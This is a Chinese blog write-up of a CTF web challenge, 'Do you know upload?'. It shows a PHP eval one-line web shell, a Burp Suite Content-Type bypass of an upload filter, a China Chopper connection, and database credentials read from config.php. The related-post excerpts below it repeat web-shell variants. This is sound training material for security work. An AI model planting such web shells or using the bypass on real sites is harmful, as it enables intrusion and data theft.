第三届“百越杯”福建省高校网络空间安全大赛Do you know upload?Writeup

最新推荐文章于 2021-07-02 21:17:15 发布
最新推荐文章于 2021-07-02 21:17:15 发布
阅读量3.8k 收藏
点赞数 1
分类专栏: CTF_Writeup  文章标签: writeup ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mars_guest/article/details/80031938
版权

推一波我的博客 Marsguest’s Blog

第三届“百越杯”福建省高校网络空间安全大赛Do you know upload?Writeup

首先,直接上传一句话木马1.php文件

<?php eval($_POST['cmd']);?>  //文件内容

发现如图弹窗
这里写图片描述
初步判断是前台直接判断文件类型,这种绕过相对简单,更改传输时文件类型即可
再次上传1.php的一句话,利用burpsuite抓包,将文件类型改为image/gif
这里写图片描述
成功上传
这里写图片描述
利用菜刀连接之前的上传好的一句话,拿到shell,看到根目录中存在文件config.php,打开,看到数据库用户名和密码
这里写图片描述
菜刀连接数据库,拿到flag
这里写图片描述
这里写图片描述

Mars_guest
关注
专栏目录
第三届百越福建省高校网络空间安全大赛writeup--Do you know upload
weixin_30586257的博客
07-14 230
一打开网址,可以看出应该是文件上传漏洞,查看源码,也有可能是文件包含 上传个图片,成功,然后上传一句话木马 通过bp进行上传绕过 , 开始菜刀连接http://e00b6eca3c9c4e14a31cf6ce409fab9006d33f25aeda472e.game.ichunqiu.com/upload/2.php,密码为a 发现有ctf.sql,but打不开,所以用...
i春秋练习——第三届百越福建省高校网络空间安全大赛-web-do you know upload
wuerror的博客
01-07 560
首先是一个文件上传,比较基础。选择上传111.php,内容是一句话马<?php eval($_POST['cmd']);?> burpsuit抓包修改Content-Type为image/gif(任一种图片都行),这类漏洞可以搭建一个upload-lab本地练一练。 显示上传成功 接下来使用蚁剑连接,连接密码就是之前一句话写的cmd,编码器可以选default,这题没...
CTF-"第三届百越福建省高校网络空间安全大赛":Do you know upload
路漫漫其修远
08-03 196
分值:100分 类型:Web题目名称:Do you know upload? 题目内容:https://www.ichunqiu.com/battalion?t=1&r=0 知识点 使用BurpSuite绕过上传文件格式校验 使用中国菜刀连接一句话???? 操作流程 打开页面,是个上传界面.直接上传php一句话,提示文件类型不允许. 上传一句话.jpg,提交时使用Burpsuite...
第三届百越福建省高校网络空间安全大赛Do you know upload
Naptmn的博客
11-18 473
打开之后很明显是个文件上传漏洞 当然也有可能是我层次太低看不出来还有哈别的可能 f12后也证明了这一点 虽然好像和这个include没有什么关系 尝试传一句话木马 之前做过一个带过滤的一句话木马,那个题忘记了,就想着继续按照上次的传,之后发现好像不太行,就换回了最简单的一句话木马 <?php eval($_POST['a']); ?> 上传后提示不支持此类文件格式,之后开始用bp抓包改类型 把里面的Type改为:image/jpeg 上传就成功了 或者先把一句话格式改为jpg,抓包时再
第三届百越福建省高校网络空间安全大赛 Do you know upload
feng的博客
09-10 664
这是涉及文件上传和蚁剑连数据库的一个题目
第三届百越福建省高校网络空间安全大赛------------Do you know upload
大方子
08-30 716
========================== 个人收获 1.通过修改文件类型绕过上传限制   ========================= 题目:   查看源码有一个提示信息 上传图片正常,上传其他的文件会出现 典型的上传绕过,这里就只需要把文件类型content-type字段改为image/gif(在上传其他文件的时候) 然后我们上传普通的php一句...
第三届百越福建省高校网络空间安全大赛_Do you know upload
a173262565的博客
04-09 264
题目在i春秋的ctf训练营 既然是上传,那就直接抓包 二话不说上来先给个00截断传个一句话助助兴 直接就成功了.... 赶紧操起菜刀去连接 进去之后发现ctf.sql是个空文件,那么flag应该在数据库中 查看config.php可以直接看到数据库账号密码 直接用菜刀连接,就能拿到flag了(一开始点开flag列并没有回显,后来自己修改了查询语句后才有...
第三届百越福建省高校网络空间安全大赛-Do you know upload?-WP
会下雪的晴天
07-17 875
上传绕过,菜刀连接数据库 题目描述 解题思路 写的明明白白,图片上传,用txt写个一句话再把后缀改成jpg即可,一句话: <?php @eval($_POST['caidao']);?> 上传,抓包 jpg改为php,GOGOGO发包 得到上传路径,用菜刀链接 进去后发现并没有FLAG,不过有一个配置文件,里面有数据库的账号和密码 菜刀连接,配置一下 <T&g...
ctf-wp-第三届百越福建省高校网络空间安全大赛 Do you know upload
key_nothing的博客
09-28 1299
考察:文件上传漏洞、数据库基本操作 访问url :只能上传图片文件 试着上传大马,burp抓包: 尝试修改文件类型为:image/jpeg 结果上传成功: 访问大马: 发现有个ctf.sql 。flag应该在数据库中,看看config.php,找到数据库连接方法: 执行一下sql语句:看看都有那些表 存在flag表,看看内容: bingo ...
第三届百越福建省高校网络空间安全大赛
andiao1218的博客
03-21 662
Upload: 选择jpg后缀的一句话木马,burp开启抓包,点击Submit上传 把jpg改为php,发包,在返回包里看到马的地址 用菜刀连接 这里有个ctf.sql,但是里面没有东西,flag可能在数据库里,打开config.php 得到数据库名称ctf,账号ctf,密码ctfctfctf 上大马 登陆mysql数据库 选择...
i春秋 Do you know upload
g1ut_t0ny的博客
07-03 291
Do you know upload 思路 打开题目,既然是图片上传,大概思路应该是抓包拦截改后缀上传一句话,菜刀连上找flag完事(简单的话)。 步骤 1、先上传图片,然后使用burpsuite拦截,更改后缀为php 2、显示上传成功,在浏览器访问一下/upload/2.php确认上传成功 3、使用菜刀连接 4、查找flag信息,发现并没有,但有一个config.php,看看里面有点啥 5、有了账户密码,那考虑添加配置信息,连接到数据库看看flag藏在里面没 T 数据库类型 H 服务器名 u 用户名
web狗之writeup--do you know upload?
neal1991的专栏
09-09 293
Do you know upload?Description加油吧,少年。(说了等于没说)Solution这是一道上传绕过的题目,其实没有什么特别的地方。这里就是想介绍一...
“百度CTF比赛 九月场 Web-Do you know upload
qq_34106499的博客
01-17 417
1. 上传类型的限制方法; 2. 抓包修改上传文件类型; 3. 菜刀连接一句话木马; 4. 菜刀连接数据库,并查询数据库内容;
i春秋-第三届百越福建省高校网络空间安全大赛
qq_44858189的博客
07-29 2293
i春秋-第三届百越福建省高校网络空间安全大赛文件上传利用菜刀连接数据库 记录一下i春秋里的一道web题,题目类型是文件上传漏洞 传送门:https://www.ichunqiu.com/battalion?t=1&r=61025 主要就两个知识点,很基础,适合新手阅读,大佬勿喷哈 文件上传 来到上传点 先上传一个正常的.jpg文件(图片中写入一句话木马) <?php eval($_POST['a']) ;?> 然后打开burp suite抓包,把后缀名jpg修改成php
福州大学计算机学院董晨老师,福州大学代表队高分斩获第三届福建省高校网络空间安全大赛冠军...
weixin_42594419的博客
07-02 1124
新闻中心讯/10月27日,由福建省教育厅、福建省网络与信息安全协调小组办公室主办的“百越第三届福建省高校网络空间安全大赛在福州圆满落幕,福州大学三支代表队揽获本届大赛的冠军暨特等奖、二等奖和三等奖。本次省赛福州大学派出的代表队由数学与计算机科学学院学生组成,最终三支参赛队均获佳绩。其中,福州大学ROIS_A队(指导老师:何萧玲,参赛者:李剑涛(2015级信息安全专业本科生),王树民(2015级...
preg_match函数,正则匹配绕过
热门推荐
SsMing的博客
12-27 1万+
以ichunqiu欢乐赛为例子 1.通过.swp 文件恢复出php脚本 vi index.php.swp recover 2.第一关源码为 &lt;?php function areyouok($greeting){    return preg_match('/Merry.*Christmas/is',$greeting); } $greeting=@$_POST['greetin...
第三届百越福建省高校网络空间安全大赛——WEB-Do you know upload
Ifish的博客
04-07 1173
打开链接,发现是文件上传题,所以就先按正常套路来burpsuite抓包改文件类型上传成功菜刀连上以后在config文件中得到用户名和密码得到flag这道题有很多种做法,我就不一一列举了,总之是很基础的题了...
i春秋CTF训练 Web Do you know upload
椰奶冻不安全的博客
07-02 629
Web Do you know upload? 题目内容:加油吧,少年。 题目链接请在i春秋申请 一个简单的文件上传,写个一句话命名为2.jpg,用burpsuit抓包后改为2.php上传成功 <?php @eval($_POST[cmd]);?> 返回了上传路径,用蚁剑连接此路径,密码为cmd,可成功连接 查看config.php发现数据库配置信息 <?php error_reporting(0); session_start(); $servername = "local
第二届强网网络安全挑战赛Writeup
"这篇资源是关于第二届强网全国网络安全挑战赛的Writeup,涵盖了多个关卡的解题策略和技巧。" 在本次网络安全挑战赛中,参赛者需要解决一系列网络安全问题,这些问题涉及到图像隐写术、密码学、程序逆向工程以及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值